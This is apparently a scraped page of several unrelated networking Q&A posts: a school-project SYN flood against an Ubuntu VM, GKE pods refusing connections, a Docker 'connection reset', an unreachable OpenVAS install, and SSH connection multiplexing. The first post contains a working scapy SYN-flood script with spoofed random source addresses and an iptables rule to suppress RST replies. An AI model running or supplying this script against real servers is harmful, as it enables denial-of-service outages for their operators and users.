Develop Reference

Ubuntu server limits to 5 SYN_RECV

For a school project I'm trying to do a DOS on an Ubuntu server (18.04) using Ubuntu desktop 18.04 with scapy. They are both placed as VM on VirtualBox.
On server side I have a python SimpleHTTPServer on port 80 that is pingable and reachable via browser by the desktop machine.
I'm trying to DoSing it using this code:
#!/usr/bin/env python
import socket, random, sys
from scapy.all import *
def sendSYN(target, port):
#creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP as random valid IP
ip.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1,65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip/tcp)
return ;
#control arguments
if len(sys.argv) != 3:
print("Few argument: %s miss IP or miss PORT" % sys.argv[0])
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launch SYNFLOOD attack at %s:%i with SYN packets." % (target, port))
while 1:
#call SYNFlood attack
sendSYN(target,port)
count += 1
print("Total packets sent: %i" % count)
print("==========================================")
that basically sends an infinite number of SYN requests to the target machine on the user specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I do sudo iptables -A OUTPUT -p tcp -s <attacker IP> RST RST -j DROP on the attacking machine, to prevent the kernel to send RST request.
The attack seems to work: on wireshark on the attacker machine I can see that packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can handle a maximum of 5 SYN_RECV although I'm doing hundreds of these requests with the attacker machine, so I think this is why I can't DOS the server. The ufw is disabled. My objective is to disable or understand what's happening on the server and disable it in order to perform the DOS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server and from that I can see that all the packets I'm sending are received on the server, so they are no lost in communication between the two virtual machines. Also running netstat -i I can see that there are no RX_DROP.

Connection refused communicating between pods

Our team has recently started to use GKE, but have encountered an intermittent problem on some of our pods that serve HTTP on port 8080. Other pods in the cluster, even on the same node, get a "connection refused" response when trying to connect using its cluster IP:
$ kubectl run -i --tty busybox --image=busybox --restart=Never -- sh!
/ # ping 10.28.2.141
PING 10.28.2.141 (10.28.2.141): 56 data bytes
64 bytes from 10.28.2.141: seq=0 ttl=62 time=2.212 ms
64 bytes from 10.28.2.141: seq=1 ttl=62 time=1.993 ms
64 bytes from 10.28.2.141: seq=2 ttl=62 time=4.662 ms
^C
--- 10.28.2.141 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 1.993/2.955/4.662 ms
/ # wget http://10.28.2.141:8080/health-check
Connecting to 10.28.2.141:8080 (10.28.2.141:8080)
wget: can't connect to remote host (10.28.2.141): Connection refused
However, the service is indeed running and listening on that port: if I exec onto the pod and run the same command, it works happily.
For other almost identical pods, this connectivity works correctly, but intermittently some fraction (maybe 10-20%) of pods end up in this state.
There are no errors in the pod logs.
This is a freshly provisioned GKE cluster on version 1.11.6-gke.3 with two nodes, no network policies, and Istio is not installed.
Any ideas on what the problem might be, or how to diagnose further? Happy to add any other information if it would be useful.

Docker - curl returned "connection reset"

I have docker host in a virtual machine.
the host is boot2docker 1.10-rc1.
and a container from a centOS 7.2 image.
I tried to run some application inside the container.
I started the two application and check the network status:
[root#564f3e59142b logs]# netstat -lnput
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:41656 0.0.0.0:* LISTEN 11995/BmtMDProvider
tcp6 0 0 :::44027 :::* LISTEN 4405/java
both application provides some HTTP service.
when I curl both applications (inside the same container) :
the response of java is OK
[root#564f3e59142b logs]# curl 127.0.0.1:44027
curl: (52) Empty reply from server
but on BmtMDProvider I got "connection reset by peer" instantly. This is a HTTP service url and it shouldn't return a "connection reset".
[root#564f3e59142b logs]# curl 127.0.0.1:41656
curl: (56) Recv failure: Connection reset by peer
the BmtMDProvider is some application from third party (I can't modify it) and works normally on a "real" machine.
Could I have some suggestion ,guide or diagnostic steps to find out where the "connection reset" comes from? Thanks.
Edit:
BmtMDProvider is a process spawned by java and it have a random port. the may be multiple instances of BmtMDProvider. java access BmtMDProvider by http (they are in same docker container and java got "connection reset", the same as curl)

Try running your container with IPV4 ports, meaning if you are currently running using
$ docker run -p 41656:41656 BmtMDProvider
run it as
$ docker run -p 127.0.0.1:41656:41656 BmtMDProvider

Cannot access OpenVAS following installation

I am sure that once I find the issue I am going to feel like a fool, but I have been pouring highlevel debugging into something that I know the answer must be right there.
Same issue on 2 different 'new' CentOS machines, I install OpenVAS, run openvas-check-setup --server a whole bunch of times, follow the instructions till error free, the ports light up but I cannot connect.
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:9390 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:9391 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9393 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9329 0.0.0.0:* LISTEN
I see the packets hit the server just fine:
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
10:32:27.119370 IP 10.20.10.47.ds-user > 10.180.10.51.9392: Flags [S], seq 2713892558, win 65535, options [mss 1460,nop,nop,sackOK], length 0
10:32:27.381288 IP 10.20.10.47.ds-mail > 10.180.10.51.9392: Flags [S], seq 2903829103, win 65535, options [mss 1460,nop,nop,sackOK], length 0
But the server never replies:
It's not a firewall:
[root#offtbn ~]# iptables-save
[root#offtbn ~]#
Firewall is empty
I tried all of the OpenVAS ports using http: and https: in every different browser and from multiple machines.
The first OpenVAS server 'did' work for a day, but something changed which is why I built the second machine from scratch. Both have the exact same issue and the exact same symptoms.
/etc/rc.d/init.d/openvas-administrator restart
/etc/rc.d/init.d/openvas-manager restart
/etc/rc.d/init.d/openvas-scanner restart
all run clean
I am really stumped on this one.

the site was having network issues.
From what I could tell, a proxy was breaking headers and somehow this exterior failure was effecting openvas's ability to do a basic login.
Did an install on a different network with the exact same distro and everything went flawless.
Not exactly sure the exact cause.

Parallel commands / file transfer on persistent single ssh connection

I have SSH connection created like:
ssh -MNf -S /tmp/mysocket user#host
And I'm using ssh without password for this session. I want to run multiple parallel commands (for example: 500 parallel commands) on the same connection and i want to copy files at the same time by using this persistent ssh socket,
so i can run commands with:
ssh -S /tmp/mysocket user#host md5sum file102 | cut -d " " -f 1
some times i get "Connection refused" warning but actually command works, i see multiple connections with "netstat -an" I understand that commands are not working on the same connection...
aokan-pc:~ $ netstat -an |grep ESTABLISHED |grep '192.168.1.30:22'
tcp 0 0 192.168.1.29:58568 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:60866 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:60385 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:60368 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:52523 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:42096 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:42177 192.168.1.30:22 ESTABLISHED
1)
Is it possible to run parallel commands on 1 persistent openssh connection? How?
2)
Can I transfer multiple parallel files to the same remote host on 1 persistent ssh connection/socket? And I have to use a checksum system, I tried to use md5sum for checksum controls... (with rsync or with scp (using multiple connections) or with nfs how?)
3)
What are disadvantages of using single socket connection for this job? Instead of using one Should i use thousands of TCP socket connections to the same host?